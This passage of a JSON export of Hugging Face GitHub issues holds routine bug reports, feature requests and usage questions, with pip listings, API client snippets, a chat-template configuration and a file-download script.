"https://github.com/huggingface/transformers/issues/33106", "state": "closed", "labels": [], "created_at": "2024-08-24T14:33:02Z", "updated_at": "2025-06-15T08:07:10Z", "user": "MohamedLahmeri01" }, { "repo": "huggingface/datasets", "number": 7123, "title": "Make dataset viewer more flexible in displaying metadata alongside images", "body": "### Feature request\r\n\r\nTo display images with their associated metadata in the dataset viewer, a `metadata.csv` file is required. In the case of a dataset with multiple subsets, this would require the CSVs to be contained in the same folder as the images since they all need to be named `metadata.csv`. The request is that this be made more flexible for datasets with multiple subsets, to avoid the need to put a `metadata.csv` into each image directory, where they are not as easily accessed. \r\n\r\n### Motivation\r\n\r\nWhen creating datasets with multiple subsets, I can't get the images to display alongside their associated metadata (it's usually one or the other that will show up). Since this requires a file specifically named `metadata.csv`, I then have to place that file within the image directory, which makes it much more difficult to access. Additionally, it still doesn't necessarily display the images alongside their metadata correctly (see, for instance, [this discussion](https://huggingface.co/datasets/imageomics/2018-NEON-beetles/discussions/8)).\r\n\r\nIt was suggested I bring this discussion to GitHub on another dataset struggling with a similar issue ([discussion](https://huggingface.co/datasets/imageomics/fish-vista/discussions/4)). In that case, it's a mix of data subsets, where some just reference the image URLs, while others actually have the images uploaded. 
The ones with images uploaded are not displaying images, but renaming that file to just `metadata.csv` would diminish the clarity of the construction of the dataset itself (and I'm not entirely convinced it would solve the issue).\r\n\r\n### Your contribution\r\n\r\nI can make a suggestion for one approach to address the issue:\r\n\r\nFor instance, even if it could just end in `_metadata.csv` or `-metadata.csv`, that would be very helpful to allow for more flexibility of dataset structure without impacting clarity. I would think that the functionality on the backend looking for `metadata.csv` could reasonably be adapted to look for such an ending on a filename (maybe also check that it has a `file_name` column?).\r\n\r\nPresumably, requiring the `configs` in a setup like on [this dataset](https://huggingface.co/datasets/imageomics/rare-species/blob/main/README.md) could also help in figuring out how it should work?\r\n```\r\nconfigs:\r\n - config_name: \r\n data_files:\r\n - .csv\r\n - /*.jpg\r\n```\r\n\r\nI'd also be happy to look at whatever solution is decided upon and contribute to the ideation.\r\n\r\nThanks for your time and consideration! The dataset viewer really is fabulous when it works :)", "url": "https://github.com/huggingface/datasets/issues/7123", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-08-23T22:56:01Z", "updated_at": "2024-10-17T09:13:47Z", "comments": 3, "user": "egrace479" }, { "repo": "huggingface/diffusers", "number": 9258, "title": "Kohya SS FLUX LoRA training is way faster on Linux than Windows, any ideas to debug? Same settings, libraries and GPU", "body": "### Describe the bug\r\n\r\nI am using Kohya SS to train a FLUX LoRA.\r\n\r\nOn Linux, an RTX 3090 gets about 5.5 seconds/it - batch size 1 and 1024x1024 px resolution.\r\n\r\nOn Windows, an RTX 3090 Ti gets 7.7 seconds/it - with the most powerful CPU, a 13900K.\r\n\r\nThis speed discrepancy between Windows and Linux is huge for some reason. \r\n\r\nA Torch upgrade from 2.1 to 2.4 on Linux caused a huge speed-up and a VRAM usage reduction, but on Windows only the VRAM usage dropped - the speed stayed the same.\r\n\r\nAny ideas for how to fix this? Using SDPA Cross Attention. \r\n\r\nI am sharing the venv pip freeze of both Windows and Linux.\r\n\r\nBoth have Python 3.10.11\r\n\r\n**Windows pip freeze**\r\n\r\n```\r\nMicrosoft Windows [Version 10.0.19045.4717]\r\n(c) Microsoft Corporation. 
All rights reserved.\r\n\r\nR:\\Kohya_GUI_Flux_Installer\\kohya_ss\\venv\\Scripts>activate\r\n\r\n(venv) R:\\Kohya_GUI_Flux_Installer\\kohya_ss\\venv\\Scripts>pip freeze\r\nabsl-py==2.1.0\r\naccelerate==0.33.0\r\naiofiles==23.2.1\r\naiohappyeyeballs==2.4.0\r\naiohttp==3.10.5\r\naiosignal==1.3.1\r\naltair==4.2.2\r\nannotated-types==0.7.0\r\nantlr4-python3-runtime==4.9.3\r\nanyio==4.4.0\r\nappdirs==1.4.4\r\nastunparse==1.6.3\r\nasync-timeout==4.0.3\r\nattrs==24.2.0\r\nbitsandbytes==0.43.3\r\ncertifi==2022.12.7\r\ncharset-normalizer==2.1.1\r\nclick==8.1.7\r\ncolorama==0.4.6\r\ncoloredlogs==15.0.1\r\ncontourpy==1.2.1\r\ncycler==0.12.1\r\ndadaptation==3.2\r\ndiffusers==0.25.0\r\ndocker-pycreds==0.4.0\r\neasygui==0.98.3\r\neinops==0.7.0\r\nentrypoints==0.4\r\nexceptiongroup==1.2.2\r\nfairscale==0.4.13\r\nfastapi==0.112.1\r\nffmpy==0.4.0\r\nfilelock==3.13.1\r\nflatbuffers==24.3.25\r\nfonttools==4.53.1\r\nfrozenlist==1.4.1\r\nfsspec==2024.2.0\r\nftfy==6.1.1\r\ngast==0.6.0\r\ngitdb==4.0.11\r\nGitPython==3.1.43\r\ngoogle-pasta==0.2.0\r\ngradio==4.41.0\r\ngradio_client==1.3.0\r\ngrpcio==1.65.5\r\nh11==0.14.0\r\nh5py==3.11.0\r\nhttpcore==1.0.5\r\nhttpx==0.27.0\r\nhuggingface-hub==0.24.5\r\nhumanfriendly==10.0\r\nidna==3.4\r\nimagesize==1.4.1\r\nimportlib_metadata==8.4.0\r\nimportlib_resources==6.4.4\r\ninvisible-watermark==0.2.0\r\nJinja2==3.1.3\r\njsonschema==4.23.0\r\njsonschema-specifications==2023.12.1\r\nkeras==3.5.0\r\nkiwisolver==1.4.5\r\nlibclang==18.1.1\r\n-e git+https://github.com/kohya-ss/sd-scripts.git@e1cd19c0c0ef55709e8eb1e5babe25045f65031f#egg=library&subdirectory=..\\..\\sd-scripts\r\nlightning-utilities==0.11.6\r\nlion-pytorch==0.0.6\r\nlycoris-lora==2.2.0.post3\r\nMarkdown==3.7\r\nmarkdown-it-py==3.0.0\r\nMarkupSafe==2.1.5\r\nmatplotlib==3.9.2\r\nmdurl==0.1.2\r\nml-dtypes==0.4.0\r\nmpmath==1.3.0\r\nmultidict==6.0.5\r\nnamex==0.0.8\r\nnetworkx==3.2.1\r\nnumpy==1.26.3\r\nnvidia-cublas-cu12==12.4.2.65\r\nnvidia-cuda-cupti-cu12==12.4.99\r\nnvidia-cuda-nvrtc-cu12==12.4.99\r\nnvidia-cuda-runtime-cu12==12.4.99\r\nnvidia-cudnn-cu12==9.1.0.70\r\nnvidia-cufft-cu12==11.2.0.44\r\nnvidia-curand-cu12==10.3.5.119\r\nnvidia-cusolver-cu12==11.6.0.99\r\nnvidia-cusparse-cu12==12.3.0.142\r\nnvidia-nvjitlink-cu12==12.4.99\r\nnvidia-nvtx-cu12==12.4.99\r\nomegaconf==2.3.0\r\nonnx==1.16.1\r\nonnxruntime-gpu==1.17.1\r\nopen-clip-torch==2.20.0\r\nopencv-python==4.7.0.68\r\nopt-einsum==3.3.0\r\noptree==0.12.1\r\norjson==3.10.7\r\npackaging==24.1\r\npandas==2.2.2\r\npathtools==0.1.2\r\npillow==10.2.0\r\nprodigyopt==1.0\r\nprotobuf==3.20.3\r\npsutil==6.0.0\r\npydantic==2.8.2\r\npydantic_core==2.20.1\r\npydub==0.25.1\r\nPygments==2.18.0\r\npyparsing==3.1.2\r\npyreadline3==3.4.1\r\npython-dateutil==2.9.0.post0\r\npython-multipart==0.0.9\r\npytorch-lightning==1.9.0\r\npytz==2024.1\r\nPyWavelets==1.7.0\r\nPyYAML==6.0.2\r\nreferencing==0.35.1\r\nregex==2024.7.24\r\nrequests==2.32.3\r\nrich==13.7.1\r\nrpds-py==0.20.0\r\nruff==0.6.1\r\nsafetensors==0.4.4\r\nscipy==1.11.4\r\nsemantic-version==2.10.0\r\nsentencepiece==0.2.0\r\nsentry-sdk==2.13.0\r\nsetproctitle==1.3.3\r\nshellingham==1.5.4\r\nsix==1.16.0\r\nsmmap==5.0.1\r\nsniffio==1.3.1\r\nstarlette==0.38.2\r\nsympy==1.12\r\ntensorboard==2.17.1\r\ntensorboard-data-server==0.7.2\r\ntensorflow==2.17.0\r\ntensorflow-intel==2.17.0\r\ntensorflow-io-gcs-filesystem==0.31.0\r\ntermcolor==2.4.0\r\ntimm==0.6.12\r\ntk==0.1.0\r\ntokenizers==0.19.1\r\ntoml==0.10.2\r\ntomlkit==0.12.0\r\ntoolz==0.12.1\r\ntorch==2.4.0+cu124\r\ntorchmetrics==1.4.1\r\ntorchvision==0.19.0+cu124\r\ntqdm==4.
66.5\r\ntransformers==4.44.0\r\ntyper==0.12.4\r\ntyping_extensions==4.9.0\r\ntzdata==2024.1\r\nurllib3==2.2.2\r\nuvicorn==0.30.6\r\nvoluptuous==0.13.1\r\nwandb==0.15.11\r\nwcwidth==0.2.13\r\nwebsockets==12.0\r\nWerkzeug==3.0.4\r\nwrapt==1.16.0\r\nxformers==0.0.27.post2\r\nyarl==1.9.4\r\nzipp==3.20.0\r\n\r\n(venv) R:\\Kohya_GUI_Flux_Installer\\kohya_ss\\venv\\Scripts>\r\n```\r\n\r\n**Ubuntu pip freeze**\r\n\r\n```\r\n(venv) Ubuntu@0054-kci-prxmx10136:~/apps/kohya_ss$ pip freeze\r\nabsl-py==2.1.0\r\naccelerate==0.33.0\r\naiofiles==23.2.1\r\naiohttp==3.9.5\r\naiosignal==1.3.1\r\naltair==4.2.2\r\nannotated-types==0.7.0\r\nantlr4-python3-runtime==4.9.3\r\nanyio==4.4.0\r\nappdirs==1.4.4\r\nastunparse==1.6.3\r\nasync-timeout==4.0.3\r\nattrs==23.2.0\r\nbitsandbytes==0.43.3\r\ncachetools==5.3.3\r\ncertifi==2024.2.2\r\ncharset-normalizer==3.3.2\r\nclick==8.1.7\r\ncoloredlogs==15.0.1\r\ncontourpy==1.2.1\r\ncycler==0.12.1\r\ndadaptation==3.1\r\ndiffusers==0.25.0\r\ndnspython==2.6.1\r\ndocker-pycreds==0.4.0\r\neasygui==0.98.3\r\neinops==0.7.0\r\nemail_validator==2.1.1\r\nentrypoints==0.4\r\nexceptiongroup==1.2.1\r\nfairscale==0.4.13\r\nfastapi==0.111.0\r\nfastapi-cli==0.0", "url": "https://github.com/huggingface/diffusers/issues/9258", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-23T11:42:53Z", "updated_at": "2024-08-23T11:55:18Z", "comments": 1, "user": "FurkanGozukara" }, { "repo": "huggingface/datasets", "number": 7122, "title": "[interleave_dataset] sample batches from a single source at a time", "body": "### Feature request\n\ninterleave_dataset and [RandomlyCyclingMultiSourcesExamplesIterable](https://github.com/huggingface/datasets/blob/3813ce846e52824b38e53895810682f0a496a2e3/src/datasets/iterable_dataset.py#L816) enable us to sample data examples from different sources. But can we also sample batches in a similar manner (each batch only contains data from a single source)?\r\n\n\n### Motivation\n\nSome recent research [[1](https://blog.salesforceairesearch.com/sfr-embedded-mistral/), [2](https://arxiv.org/pdf/2310.07554)] shows that source homogenous batching can be helpful for contrastive learning. Can we add a function called `RandomlyCyclingMultiSourcesBatchesIterable` to support this functionality?\n\n### Your contribution\n\nI can contribute a PR. 
But I wonder what the best way is to test its correctness and robustness.", "url": "https://github.com/huggingface/datasets/issues/7122", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-08-23T07:21:15Z", "updated_at": "2024-08-23T07:21:15Z", "comments": 0, "user": "memray" }, { "repo": "huggingface/text-generation-inference", "number": 2452, "title": "How to get the token probability via a curl request?", "body": "### Feature request\n\ncurl -v -X POST http://.....srv/generate -H \"Content-Type: application/json\" -d '{\"inputs\": \"xxxxx:\",\"parameters\": {\"max_new_tokens\": 256}}'\r\nUsing this curl request, I get output like\r\n{\"generated_text\": xxxx}\r\n\r\nHow can I get the generated-text probabilities from the LLM in a TGI service? (See the sketch further below.)\r\n\r\n\n\n### Motivation\n\nno\n\n### Your contribution\n\nno", "url": "https://github.com/huggingface/text-generation-inference/issues/2452", "state": "closed", "labels": [], "created_at": "2024-08-23T03:01:17Z", "updated_at": "2024-08-27T01:32:44Z", "user": "TWSFar" }, { "repo": "huggingface/speech-to-speech", "number": 37, "title": "[Feature request] How about adding an optional speech to viseme model at the end of our chain?", "body": "Hi there,\r\n\r\nThank you so much for your work on this project. It's truly amazing, and I\u2019m excited to see all the innovative tools that people will build based on it. I can already imagine many will integrate your speech-to-speech pipeline with avatar or robot embodiments, where lip sync will be crucial. \r\n\r\nTo support this, could you help us add functionality to the current flow? The current process includes 1) speech-to-text, 2) LLM, and 3) text-to-speech. I\u2019d like to add a fourth step: either speech-to-viseme or speech-to-text with `return_timestamp = \"word\"`, followed by manual mapping of words to phonemes, and then to visemes.\r\n\r\nBest regards, \r\nFabio", "url": "https://github.com/huggingface/speech-to-speech/issues/37", "state": "open", "labels": [], "created_at": "2024-08-22T21:32:47Z", "updated_at": "2024-09-09T17:16:45Z", "user": "fabiocat93" }, { "repo": "huggingface/huggingface_hub", "number": 2480, "title": "How to use the HF Nvidia NIM API with the HF inference client?", "body": "### Describe the bug\r\n\r\nWe recently introduced the [Nvidia NIM API](https://huggingface.co/blog/inference-dgx-cloud) for selected models. The recommended use is via the OAI client like this (with a specific fine-grained token for an enterprise org): \r\n\r\n```py\r\nfrom openai import OpenAI\r\n\r\nclient = OpenAI(\r\n base_url=\"https://huggingface.co/api/integrations/dgx/v1\",\r\n api_key=\"YOUR_FINE_GRAINED_TOKEN_HERE\"\r\n)\r\n\r\nchat_completion = client.chat.completions.create(\r\n model=\"meta-llama/Meta-Llama-3-8B-Instruct\",\r\n messages=[\r\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\r\n {\"role\": \"user\", \"content\": \"Count to 500\"}\r\n ],\r\n stream=True,\r\n max_tokens=1024\r\n)\r\n\r\n# Iterate and print stream\r\nfor message in chat_completion:\r\n print(message.choices[0].delta.content, end='')\r\n```\r\n\r\nHow can users use this API with the HF inference client directly? 
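\r\n(Referring back to the TGI log-probability question above: a sketch of one approach, using TGI's generate endpoint with `\"details\": true` - the field names are from TGI's docs and may vary across versions:)\r\n\r\n```python\r\nimport requests\r\n\r\nresp = requests.post(\r\n    \"http://localhost:8080/generate\",  # placeholder URL for the TGI server\r\n    json={\r\n        \"inputs\": \"What is Deep Learning?\",\r\n        \"parameters\": {\"max_new_tokens\": 16, \"details\": True},\r\n    },\r\n)\r\n# With details enabled, the response carries per-token text and logprob.\r\nfor tok in resp.json()[\"details\"][\"tokens\"]:\r\n    print(tok[\"text\"], tok[\"logprob\"])\r\n```\r\n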
\r\nThe InferenceClient.chat_completions [docs](https://huggingface.co/docs/huggingface_hub/main/en/package_reference/inference_client#huggingface_hub.InferenceClient.chat_completion) provide this example snippet for OAI syntax (example 3): \r\n\r\n```py\r\n# instead of `from openai import OpenAI`\r\nfrom huggingface_hub import InferenceClient\r\n\r\n# instead of `client = OpenAI(...)`\r\nclient = InferenceClient(\r\n base_url=...,\r\n api_key=...,\r\n)\r\n\r\noutput = client.chat.completions.create(\r\n model=\"meta-llama/Meta-Llama-3-8B-Instruct\",\r\n messages=[\r\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\r\n {\"role\": \"user\", \"content\": \"Count to 10\"},\r\n ],\r\n stream=True,\r\n max_tokens=1024,\r\n)\r\n\r\nfor chunk in output:\r\n print(chunk.choices[0].delta.content)\r\n```\r\n\r\nWhen I transpose the logic from the NIM OAI code snippet to the code above, I get this: \r\n\r\n```py\r\n# instead of `from openai import OpenAI`\r\nfrom huggingface_hub import InferenceClient\r\n\r\n# instead of `client = OpenAI(...)`\r\nclient = InferenceClient(\r\n api_key=\"enterprise-org-token\",\r\n base_url=\"https://huggingface.co/api/integrations/dgx/v1\",\r\n)\r\n\r\noutput = client.chat.completions.create(\r\n model=\"meta-llama/Meta-Llama-3-8B-Instruct\",\r\n messages=[\r\n {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\r\n {\"role\": \"user\", \"content\": \"Count to 10\"},\r\n ],\r\n stream=True,\r\n max_tokens=1024,\r\n)\r\n\r\nfor chunk in output:\r\n print(chunk.choices[0].delta.content)\r\n```\r\n\r\nThis throws this error: \r\n```py\r\n---------------------------------------------------------------------------\r\nHTTPError Traceback (most recent call last)\r\nFile ~/miniconda/lib/python3.9/site-packages/huggingface_hub/utils/_errors.py:304, in hf_raise_for_status(response, endpoint_name)\r\n 303 try:\r\n--> 304 response.raise_for_status()\r\n 305 except HTTPError as e:\r\n\r\nFile ~/miniconda/lib/python3.9/site-packages/requests/models.py:1024, in Response.raise_for_status(self)\r\n 1023 if http_error_msg:\r\n-> 1024 raise HTTPError(http_error_msg, response=self)\r\n\r\nHTTPError: 400 Client Error: Bad Request for url: https://huggingface.co/api/integrations/dgx/v1/chat/completions\r\n\r\nThe above exception was the direct cause of the following exception:\r\n\r\nBadRequestError Traceback (most recent call last)\r\nCell In[48], line 10\r\n 4 # instead of `client = OpenAI(...)`\r\n 5 client = InferenceClient(\r\n 6 api_key=\"hf_****\",\r\n 7 base_url=\"https://huggingface.co/api/integrations/dgx/v1\",\r\n 8 )\r\n---> 10 output = client.chat.completions.create(\r\n 11 model=\"meta-llama/Meta-Llama-3-8B-Instruct\",\r\n 12 messages=[\r\n 13 {\"role\": \"system\", \"content\": \"You are a helpful assistant.\"},\r\n 14 {\"role\": \"user\", \"content\": \"Count to 10\"},\r\n 15 ],\r\n 16 stream=True,\r\n 17 max_tokens=1024,\r\n 18 )\r\n 20 for chunk in output:\r\n 21 print(chunk.choices[0].delta.content)\r\n\r\nFile ~/miniconda/lib/python3.9/site-packages/huggingface_hub/inference/_client.py:837, in InferenceClient.chat_completion(self, messages, model, stream, frequency_penalty, logit_bias, logprobs, max_tokens, n, presence_penalty, response_format, seed, stop, temperature, tool_choice, tool_prompt, tools, top_logprobs, top_p)\r\n 833 # `model` is sent in the payload. Not used by the server but can be useful for debugging/routing.\r\n 834 # If it's a ID on the Hub => use it. 
Otherwise, we use a random string.\r\n 835 model_id = model if not is_url and model.count(\"/\") == 1 else \"tgi\"\r\n--> 837 data = self.post(\r\n 838 model=model_url,\r\n 839 json=dict(\r\n 840 model=model_id,\r\n 841 messages=messages,\r\n 842 frequency_penalty=frequency_penalty,\r\n 843 logit_bias=logit_bias,\r\n 844 logprobs=logprobs,\r\n 845 max_tokens=max_tokens,\r\n 846 n=n,\r\n 847 presence_penalty=presence_penalty,\r\n 848 response_format=response_format,\r\n 849 seed", "url": "https://github.com/huggingface/huggingface_hub/issues/2480", "state": "closed", "labels": [ "bug" ], "created_at": "2024-08-22T12:32:16Z", "updated_at": "2024-08-26T12:45:55Z", "user": "MoritzLaurer" }, { "repo": "huggingface/transformers.js", "number": 896, "title": "How to use this model: Xenova/bge-reranker-base", "body": "### Question\n\nI see that it supports transformers.js, but I can't find the instructions for use. Please help me with using it.", "url": "https://github.com/huggingface/transformers.js/issues/896", "state": "closed", "labels": [ "question" ], "created_at": "2024-08-22T07:33:42Z", "updated_at": "2024-08-29T00:12:52Z", "user": "gy9527" }, { "repo": "huggingface/sentence-transformers", "number": 2900, "title": "how to keep `encode_multi_process` output on the GPU", "body": "I saw this [example](https://github.com/UKPLab/sentence-transformers/blob/master/examples/applications/semantic-search/semantic_search.py) where we can do the following:\r\n`query_embedding = embedder.encode(query, convert_to_tensor=True)`\r\n`hits = util.semantic_search(query_embedding, corpus_embeddings, top_k=5)`\r\n\r\nI read that setting `convert_to_tensor=True` keeps the embedding vectors on the GPU to optimize the similarity calculations. But if I work with multiple CPUs and GPUs, can I do the same? I didn't see a `convert_to_tensor` argument for `encode_multi_process`. ", "url": "https://github.com/huggingface/sentence-transformers/issues/2900", "state": "open", "labels": [], "created_at": "2024-08-21T21:05:35Z", "updated_at": "2024-08-21T21:07:39Z", "user": "anshuchen" }, { "repo": "huggingface/parler-tts", "number": 116, "title": "How to use the Italian language?", "body": "Is it possible to use an Italian-style speaker? I've tried many prompts, but all of them come out in an English style.", "url": "https://github.com/huggingface/parler-tts/issues/116", "state": "open", "labels": [], "created_at": "2024-08-21T15:24:57Z", "updated_at": "2025-06-18T13:20:22Z", "user": "piperino11" }, { "repo": "huggingface/chat-ui", "number": 1423, "title": "Generated answers with Llama 3 include <|start_header_id|>assistant<|end_header_id|>", "body": "## Bug description\r\n\r\nI have set up a local endpoint serving Llama 3. All the answers I get from it start with `<|start_header_id|>assistant<|end_header_id|>`.\r\n\r\n## Steps to reproduce\r\n\r\nSet up Llama 3 in a local endpoint. 
In my `.env.local`, it is defined as the following:\r\n\r\n```\r\nMODELS=`[\r\n {\r\n \"name\": \"llama3\",\r\n \"displayName\": \"Llama 3 loaded from GCS\",\r\n \"chatPromptTemplate\": \"<|begin_of_text|><|start_header_id|>system<|end_header_id|>\\n\\n{{preprompt}}<|eot_id|>{{#each messages}}{{#ifUser}}<|start_header_id|>user<|end_header_id|>\\n\\n{{content}}<|eot_id|><|start_header_id|>assistant<|end_header_id|>{{/ifUser}}{{#ifAssistant}}{{content}}<|eot_id|>{{/ifAssistant}}{{/each}}\",\r\n \"preprompt\": \"You are a helpful AI assistant.\",\r\n \"parameters\": {\r\n \"stop\": [\"<|endoftext|>\", \"<|eot_id|>\"],\r\n \"temperature\": 0.4,\r\n \"max_new_tokens\": 1024,\r\n \"truncate\": 3071\r\n },\r\n \"endpoints\": [{\r\n \"type\": \"openai\",\r\n \"baseURL\": \"http://localhost:8080/openai/v1\"\r\n }],\r\n }\r\n]`\r\n```\r\n\r\n## Context\r\n\r\nI have tried variations of the chat template, also not providing any. The `<|start_header_id|>assistant<|end_header_id|>` is always there.\r\n\r\nAFAIK, these tokens should be the last ones in the prompt, so that the model knows that it should continue the prompt with the assistant's answer. It seems they are not properly appended to the prompt, but the model still realizes it should add them itself.\r\n\r\n### Logs\r\n\r\nThis a sample request that my local server receives (running VLLM):\r\n\r\n```\r\nINFO 08-21 11:47:18 async_llm_engine.py:529] Received request cmpl-d1482c4eb4ce49c2a259a2f782ee3712-0: prompt: \"<|begin_of_text|><|start_header_id|>system<|end_header_id|>\r\n\r\nYou are a helpful AI assistant. Unless otherwise specified, give concise and straightforward answers.<|eot_id|><|start_header_id|>user<|end_header_id|>\r\n\r\n[ChatCompletionRequestMessageContentPartText(type='text', text='Hi, what is pizza?')]<|eot_id|>\", sampling_params: SamplingParams(n=1, best_of=1, presence_penalty=0.0, frequency_penalty=0.0, repetition_penalty=1.0, temperature=0.4, top_p=1.0, top_k=-1, min_p=0.0, seed=None, use_beam_search=False, length_penalty=1.0, early_stopping=False, stop=['<|endoftext|>', '<|eot_id|>'], stop_token_ids=[], include_stop_str_in_output=False, ignore_eos=False, max_tokens=1024, min_tokens=0, logprobs=None, prompt_logprobs=None, skip_special_tokens=True, spaces_between_special_tokens=True, truncate_prompt_tokens=None), prompt_token_ids: [128000, 128000, 128006, 9125, 128007, 271, 2675, 527, 264, 11190, 15592, 18328, 13, 11115, 6062, 5300, 11, 3041, 64694, 323, 31439, 11503, 13, 128009, 128006, 882, 128007, 271, 58, 16047, 34290, 1939, 2097, 2831, 5920, 1199, 5930, 1151, 1342, 518, 1495, 1151, 13347, 11, 1148, 374, 23317, 30, 52128, 128009], lora_request: None.\r\n```\r\n\r\n### Specs\r\n\r\n- **OS**: macOS\r\n- **Browser**: Firefox 129.0.1\r\n- **chat-ui commit**: 28351dfefa581e4494b2047de3c093eaa7a7cdbc\r\n\r\n### Config\r\n\r\n```\r\nMONGODB_URL=mongodb://localhost:27017\r\nHF_TOKEN=...\r\n```\r\n\r\n## Notes\r\n\r\nI'm not sure what the `ChatCompletionRequestMessageContentPartText(...)` in the prompt is supposed to mean. Is it some internal request object rendered as a string?", "url": "https://github.com/huggingface/chat-ui/issues/1423", "state": "closed", "labels": [ "support" ], "created_at": "2024-08-21T11:56:47Z", "updated_at": "2024-08-26T14:31:53Z", "comments": 5, "user": "erickrf" }, { "repo": "huggingface/trl", "number": 1955, "title": "How to fine-tune LLaVA using PPO", "body": "Does LLaVA support training with PPO? 
\r\nIf not, what modifications do I need to make to enable this support?", "url": "https://github.com/huggingface/trl/issues/1955", "state": "open", "labels": [ "\u2728 enhancement", "\ud83d\udc41\ufe0f VLM" ], "created_at": "2024-08-21T07:34:30Z", "updated_at": "2024-08-26T11:13:46Z", "user": "Yufang-Liu" }, { "repo": "huggingface/diffusers", "number": 9235, "title": "Is there any way to get diffusers-v0.27.0.dev0?", "body": "Is there any way to get diffusers-v0.27.0.dev0? I want to compare the difference between diffusers-v0.27.0.dev0 and branches developed on top of it in another project, but I didn't find it on the releases or tags page.", "url": "https://github.com/huggingface/diffusers/issues/9235", "state": "closed", "labels": [], "created_at": "2024-08-21T03:42:11Z", "updated_at": "2024-08-21T05:10:26Z", "comments": 2, "user": "D222097" }, { "repo": "huggingface/llm.nvim", "number": 108, "title": "How to use proxy env var", "body": "I am unable to communicate with any http endpoints because I am behind a corporate proxy that uses self-signed certificates. Typically we use the http_proxy and https_proxy environment variables for this purpose, but I can't see any obvious configurations that I can add to my lua config to make this work.\r\n\r\nI have tried adding http_proxy = \"http://ProxyURL:ProxyPort\" to cmd_env in the llm.setup but it still keeps throwing an http error... invalid peer certificate, unknown issuer.", "url": "https://github.com/huggingface/llm.nvim/issues/108", "state": "open", "labels": [], "created_at": "2024-08-20T18:52:54Z", "updated_at": "2024-08-20T18:53:36Z", "user": "SethARhodes" }, { "repo": "huggingface/huggingface_hub", "number": 2468, "title": "How can I modify this repo file downloader Jupyter notebook script to improve download speed? Perhaps multiple downloads at the same time?", "body": "The code below works, but it is just slow.\r\n\r\nHow can I speed it up? The machine has much more bandwidth available, and I really need to download lots of AI models to test.\r\n\r\nThank you\r\n\r\n\r\n```\r\nimport os\r\nimport requests\r\nimport hashlib\r\nfrom huggingface_hub import list_repo_files, hf_hub_url, hf_hub_download\r\nfrom huggingface_hub.utils import HfFolder\r\nfrom tqdm import tqdm\r\n\r\ndef calculate_file_hash(file_path):\r\n sha256_hash = hashlib.sha256()\r\n with open(file_path, \"rb\") as f:\r\n for byte_block in iter(lambda: f.read(4096), b\"\"):\r\n sha256_hash.update(byte_block)\r\n return sha256_hash.hexdigest()\r\n\r\ndef download_file(url, target_path, headers, expected_size=None):\r\n response = requests.get(url, headers=headers, stream=True)\r\n response.raise_for_status()\r\n\r\n total_size = int(response.headers.get('content-length', 0))\r\n mode = 'ab' if os.path.exists(target_path) else 'wb'\r\n \r\n with tqdm(total=total_size, unit='B', unit_scale=True, desc=os.path.basename(target_path), initial=0, ascii=True) as pbar:\r\n with open(target_path, mode) as f:\r\n for chunk in response.iter_content(chunk_size=8192):\r\n if chunk:\r\n f.write(chunk)\r\n pbar.update(len(chunk))\r\n\r\n if expected_size and os.path.getsize(target_path) != expected_size:\r\n raise ValueError(f\"Size mismatch for {target_path}. 
Expected: {expected_size}, Got: {os.path.getsize(target_path)}\")\r\n\r\n# Define the repository and target folder\r\nrepo_id = \"YourUserName/reponame\"\r\ntarget_folder = \"/home/Ubuntu/apps/stable-diffusion-webui/models/Stable-diffusion\"\r\n\r\n# Retrieve the token from the .huggingface folder or set it manually\r\ntoken = HfFolder.get_token()\r\nif not token:\r\n raise ValueError(\"Hugging Face token not found. Please log in using `huggingface-cli login` or set the token manually.\")\r\n\r\nheaders = {\"Authorization\": f\"Bearer {token}\"}\r\n\r\n# List all files in the repository\r\nfiles = list_repo_files(repo_id)\r\n\r\n# Ensure the target folder exists\r\nos.makedirs(target_folder, exist_ok=True)\r\n\r\n# Download each file directly to the target folder\r\nfor file in files:\r\n try:\r\n target_path = os.path.join(target_folder, file)\r\n \r\n # Get file metadata\r\n file_info = hf_hub_download(repo_id, filename=file, repo_type='model', token=token, local_dir=target_folder, local_dir_use_symlinks=False)\r\n expected_size = os.path.getsize(file_info)\r\n\r\n # Check if the file already exists and has the correct size\r\n if os.path.exists(target_path):\r\n if os.path.getsize(target_path) == expected_size:\r\n print(f\"File {file} already exists and is complete. Skipping download.\")\r\n continue\r\n else:\r\n print(f\"File {file} exists but is incomplete. Resuming download.\")\r\n\r\n # Get the URL for the file\r\n file_url = hf_hub_url(repo_id, filename=file, repo_type='model')\r\n \r\n # Ensure subdirectories exist\r\n os.makedirs(os.path.dirname(target_path), exist_ok=True)\r\n \r\n # Download the file with authentication and size verification\r\n download_file(file_url, target_path, headers, expected_size)\r\n \r\n # Set the correct permissions for the downloaded file\r\n os.chmod(target_path, 0o644) # Read and write for owner, read for group and others\r\n \r\n except Exception as e:\r\n print(f\"An error occurred while processing file {file}: {e}\")\r\n\r\nprint(f\"All files have been downloaded and verified in {target_folder}\")\r\n```\r\n\r\n\r\n### System info\r\n\r\n```shell\r\nCopy-and-paste the text below in your GitHub issue.\r\n\r\n- huggingface_hub version: 0.24.6\r\n- Platform: Linux-6.5.0-45-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Running in iPython ?: Yes\r\n- iPython shell: ZMQInteractiveShell\r\n- Running in notebook ?: Yes\r\n- Running in Google Colab ?: No\r\n- Token path ?: /home/Ubuntu/.cache/huggingface/token\r\n- Has saved token ?: True\r\n- Who am I ?: MonsterMMORPG\r\n- Configured git credential helpers: \r\n- FastAI: N/A\r\n- Tensorflow: N/A\r\n- Torch: N/A\r\n- Jinja2: 3.1.4\r\n- Graphviz: N/A\r\n- keras: N/A\r\n- Pydot: N/A\r\n- Pillow: N/A\r\n- hf_transfer: N/A\r\n- gradio: N/A\r\n- tensorboard: N/A\r\n- numpy: N/A\r\n- pydantic: N/A\r\n- aiohttp: 3.10.5\r\n- ENDPOINT: https://huggingface.co\r\n- HF_HUB_CACHE: /home/Ubuntu/.cache/huggingface/hub\r\n- HF_ASSETS_CACHE: /home/Ubuntu/.cache/huggingface/assets\r\n- HF_TOKEN_PATH: /home/Ubuntu/.cache/huggingface/token\r\n- HF_HUB_OFFLINE: False\r\n- HF_HUB_DISABLE_TELEMETRY: False\r\n- HF_HUB_DISABLE_PROGRESS_BARS: None\r\n- HF_HUB_DISABLE_SYMLINKS_WARNING: False\r\n- 